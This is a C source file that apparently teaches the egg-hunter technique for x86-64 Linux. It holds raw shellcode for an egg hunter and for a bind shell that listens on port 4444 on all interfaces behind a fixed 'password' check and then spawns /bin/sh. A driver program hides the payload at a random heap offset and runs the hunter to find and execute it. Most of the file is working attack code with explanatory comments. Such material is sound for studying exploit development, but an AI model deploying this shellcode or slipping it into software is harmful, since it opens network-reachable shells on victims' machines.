// Egg Hunter Demo - Payload on heap
// Compile with:
// gcc -z execstack -fno-stack-protector egg_hunter_demo.c -o egg_demo
// NOTE(review): the hunter executes from .data and then jumps into a malloc()'d
// chunk, so both of those mappings must be executable. `-z execstack` only marks
// the stack; whether the kernel also makes the heap executable for such a binary
// (READ_IMPLIES_EXEC) is kernel-dependent, and to my knowledge recent x86-64
// kernels no longer do it. If the jump into the heap faults, mmap()/mprotect()
// the chunk with PROT_EXEC instead -- TODO confirm on the target kernel.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
// Egg hunter (x86-64 Linux). The first five bytes are `mov ebx, 0xfceb02eb`
// (the 4-byte tag); it is pushed, shifted by 32 and OR'ed with itself so rbx
// holds the doubled 8-byte egg. Memory is then walked a page (0x1000, set via
// `mov dh, 0x10`) at a time: each page is probed with the access() syscall
// (rax = 0x15) and skipped when al == 0xf2 (-EFAULT, i.e. unmapped). A readable
// page is scanned with `cmp rbx, [rdi]` / `inc rdi` / `loop`; on a hit the code
// does `jmp rdi` straight onto the egg, which is itself executable
// (jmp +2 / jmp -4 pairs) and falls through into the payload 8 bytes later.
unsigned char egghunter[] = \
"\xbb\xeb\x02\xeb\xfc\x53\x48\xc1\xe3\x20\x48\x0b\x1c\x24\x48\x31\xd2\x52\xb6\x10\x5f\x57\x5e\x6a\x15\x58\x0f\x05\x3c\xf2\x75\x05\x48\x01\xd7\xeb\xf2\x52\x59\x83\xe9\x08\x48\x3b\x1f\x74\x0b\x48\xff\xc7\xe2\xf6\x48\x83\xc7\x08\xeb\xdd\xff\xe7";
// Bind shell payload (x86-64 Linux) - listens on port 4444 on ALL interfaces,
// not only 127.0.0.1: the sockaddr_in it pushes (`add ax, 0x5c11; shl rax, 16;
// add ax, 2` on top of a zero qword) is {AF_INET, port 0x115c = 4444,
// sin_addr = 0}, i.e. INADDR_ANY, so the shell is reachable from the network.
// Flow: socket(AF_INET, SOCK_STREAM, 0) / bind / listen / accept; write the
// 24-byte prompt "Speak friend and enter: ", recvfrom() 8 bytes and cmpsb them
// against the 8-byte secret "password" stored right after the prompt. On a
// match: write "Welcome\n", dup2() the client fd onto 0/1/2, execve("/bin/sh")
// (the "x/bin/sh" immediate is shifted right by 8 to drop the 'x'). Otherwise:
// write "Wrong\n", shutdown(client, SHUT_RDWR) and loop back to accept().
// The fixed 8-byte secret is a demo convenience, not real authentication.
unsigned char payload[] = \
"\x48\x89\xe5\xeb\x04\x41\x5f\xeb\x5c\xe8\xf7\xff\xff\xff\x53\x70\x65\x61\x6b\x20\x66\x72\x69\x65\x6e\x64\x20\x61\x6e\x64\x20\x65\x6e\x74\x65\x72\x3a\x20\x70\x61\x73\x73\x77\x6f\x72\x64\x57\x65\x6c\x63\x6f\x6d\x65\x0a\x57\x72\x6f\x6e\x67\x0a\x48\x31\xc0\x50\x5b\x48\x83\xc0\x3c\x48\x83\xc3\x01\x48\x89\xec\x0f\x05\x48\x8b\x7d\xd8\x48\x31\xc0\x49\x89\xc2\x49\x89\xc0\x49\x89\xc1\x48\x83\xc0\x2c\x0f\x05\xc3\x48\x31\xc0\x50\x66\x05\x11\x5c\x48\xc1\xe0\x10\x66\x83\xc0\x02\x50\x48\x31\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc0\x27\x0f\x05\x48\x83\xf8\xff\x7e\xa8\x50\x48\x31\xc0\x48\x83\xc0\x31\x48\x8b\x7d\xe8\x48\x8d\x75\xf0\x48\x31\xd2\x48\x83\xc2\x10\x52\x0f\x05\x48\x83\xf8\xff\x7e\x88\x48\x31\xc0\x48\x83\xc0\x02\x48\x89\xc6\x48\x83\xc0\x30\x0f\x05\x48\x83\xf8\xff\x0f\x8e\x6e\xff\xff\xff\x48\x31\xc0\x48\x83\xc0\x2b\x48\x8b\x7d\xe8\x48\x8d\x75\xf0\x48\x8d\x55\xe0\x0f\x05\x48\x83\xf8\xff\x0f\x8e\x4f\xff\xff\xff\x50\x4c\x89\xfe\x48\x31\xd2\x48\x83\xc2\x18\xe8\x51\xff\xff\xff\x48\x8b\x7d\xd8\x48\x8d\x75\xf0\x48\x31\xc0\x50\x50\x5a\x41\x5a\x49\x89\xc0\x49\x89\xc1\x48\x83\xc2\x08\x48\x83\xc0\x2d\x0f\x05\x48\x8d\x75\xf0\x49\x8d\x7f\x18\x48\x31\xc9\x48\x83\xc1\x08\xa6\x75\x14\xe2\xfb\x49\x8d\x77\x20\x48\x31\xd2\x48\x83\xc2\x08\xe8\x0d\xff\xff\xff\xeb\x25\x49\x8d\x77\x28\x48\x31\xd2\x48\x83\xc2\x06\xe8\xfb\xfe\xff\xff\x48\x31\xc0\x50\x5e\x48\x83\xc0\x30\x5f\x48\x83\xc6\x02\x0f\x05\xe9\x66\xff\xff\xff\x48\x31\xc0\x48\x83\xc0\x21\x49\x89\xc0\x48\x8b\x7d\xd8\x48\x31\xf6\x0f\x05\x4c\x89\xc0\x48\xff\xc6\x0f\x05\x4c\x89\xc0\x48\xff\xc6\x0f\x05\x48\x31\xc0\x50\x5a\x48\xbb\x78\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x48\x89\x5d\xf0\x48\x8d\x7d\xf0\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\xe8\x86\xfe\xff\xff";
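/*
 * Demo driver.
 *
 * 1. Pads the heap with a random number (2..1001) of deliberately leaked
 *    1 KiB chunks so the payload does not sit at a predictable address.
 * 2. Plants the egg -- two back-to-back copies of the 4-byte tag -- followed
 *    by the payload at a random offset (0..511) inside a fresh 1 KiB chunk.
 * 3. Jumps into `egghunter`, which has to find the doubled tag by scanning
 *    memory and then transfers control into the payload.
 *
 * Changes versus the previous version: C99-conforming `int main(void)` in
 * place of an implicit-int `main()`; the payload length is taken from
 * `sizeof payload` instead of a hard-coded 438; every malloc() result is
 * checked; and the egg+payload is verified to fit in the chunk before the
 * copies happen.
 *
 * Returns 0 only if the egg hunter returns, which it normally does not:
 * on success it jumps into the payload and never comes back.
 */
int main(void)
{
    /* The tag is `jmp short +2; jmp short -4` -- valid code, so the hunter can
     * jump onto the egg itself and execution falls through both copies into the
     * payload 8 bytes later. Must match the immediate in egghunter
     * (`mov ebx, 0xfceb02eb`). */
    static const unsigned char egg[4] = { 0xeb, 0x02, 0xeb, 0xfc };
    enum { CHUNK_SIZE = 1024, MAX_PAD = 512, MAX_JUNK_PAGES = 1000 };
    /* payload[] is a string literal, so sizeof counts the trailing NUL. */
    const size_t payload_len = sizeof payload - 1;
    const size_t egg_len = 2 * sizeof egg;

    printf("Allocating heap data\n");
    srand((unsigned) time(NULL));

    int nPages = (rand() % MAX_JUNK_PAGES) + 2;
    printf("Padding heap with %d pages of junk\n", nPages);
    /* Intentionally leaked: the chunks exist only to move the payload around. */
    for (int i = 0; i < nPages; i++) {
        if (malloc(CHUNK_SIZE) == NULL) {
            fprintf(stderr, "malloc failed while padding the heap\n");
            return EXIT_FAILURE;
        }
    }

    unsigned char *heap = malloc(CHUNK_SIZE);
    if (heap == NULL) {
        fprintf(stderr, "malloc failed for the payload chunk\n");
        return EXIT_FAILURE;
    }

    int nBytes = rand() % MAX_PAD;
    printf("Padding payload page by %d bytes\n", nBytes);
    /* Always true with the constants above (511 + 8 + 438 < 1024), but keep the
     * bound explicit so a larger payload cannot silently overflow the chunk. */
    if ((size_t) nBytes + egg_len + payload_len > CHUNK_SIZE) {
        fprintf(stderr, "egg + payload do not fit in the chunk\n");
        free(heap);
        return EXIT_FAILURE;
    }

    printf("Appending payload\n");
    memcpy(heap + nBytes, egg, sizeof egg);
    memcpy(heap + nBytes + sizeof egg, egg, sizeof egg);
    memcpy(heap + nBytes + egg_len, payload, payload_len);

    printf("Triggering egg hunter\n");
    /* Object-pointer to function-pointer cast: not strictly conforming C, but
     * it is the point of the demo. Needs egghunter's page (.data) and the heap
     * to be executable. */
    int (*run)(void) = (int (*)(void)) egghunter;
    run();
    return 0;
}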